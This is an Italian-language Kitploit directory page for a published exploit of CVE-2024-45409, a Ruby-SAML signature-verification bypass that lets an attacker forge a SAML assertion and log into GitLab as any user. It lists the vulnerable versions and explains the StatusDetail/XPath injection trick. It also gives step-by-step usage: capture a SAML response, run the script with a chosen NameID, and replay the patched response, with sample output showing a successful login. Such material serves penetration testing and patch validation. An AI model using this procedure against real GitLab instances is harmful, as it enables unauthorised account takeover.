Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-45409 — Exploit del bypass dell'autenticazione di Ruby-SAML / GitLab (CVE-2024-45409) | Kitploit
Strumenti/GitHubGitHub/synacktiv/cve-2024-45409
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Exploit del bypass dell'autenticazione di Ruby-SAML / GitLab (CVE-2024-45409)

Vedi Repository
84131 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit del bypass dell'autenticazione Ruby-SAML / GitLab (CVE-2024-45409)

Questo script sfrutta la CVE-2024-45409 che consente a un attaccante non autenticato, con accesso a qualsiasi documento SAML firmato emesso dall'IDP, di forgiare una SAML Response/Assertion e ottenere l'accesso come qualsiasi utente su GitLab.

Tutte le seguenti versioni di GitLab (CE/EE) sono vulnerabili:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

Questo exploit inietta il DigestValue dell'assertion modificata nell'elemento StatusDetail, consentendo di introdurre furtivamente il selettore XPath che userà questo valore invece di quello nel blocco SignedInfo.

Requisiti

  • Una SAML Response valida emessa dall'IDP

Utilizzo

root@kitploit:~
apt install python3-lxml

Intercettare l'URL e la risposta SAML dell'IDP codificata in Base64, quindi modificare il contenuto XML utilizzando lo script.

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64

Successivamente, sostituisci il valore del parametro SAMLResponse con l'output dello script. Se l'autenticazione riesce, verrai reindirizzato alla homepage di GitLab.

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>

Riferimenti

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
Scarica lo strumento